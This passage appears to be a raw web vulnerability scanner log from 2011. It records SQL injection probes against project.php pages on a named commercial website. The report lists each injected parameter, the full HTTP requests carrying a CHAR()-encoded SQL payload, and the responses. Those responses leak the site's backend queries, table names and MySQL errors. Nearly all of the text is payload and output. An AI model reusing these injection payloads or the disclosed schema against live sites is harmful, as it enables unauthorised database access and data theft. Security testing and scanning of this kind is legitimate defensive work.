convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/meac00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g2ektgqg6f8aqv4u2pbescqi63; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/inco00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qei7ktqh0ftp7m3fhbsd54db26; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B%20(select+convert(in..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=add482e3u38tj137540fr8snd4; path=/
Content-Length: 4153
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9e8rb3lfiffscj6mnsdocqt0j3; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1g5egb3nr1ejfbahhjdb5kap66; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select 
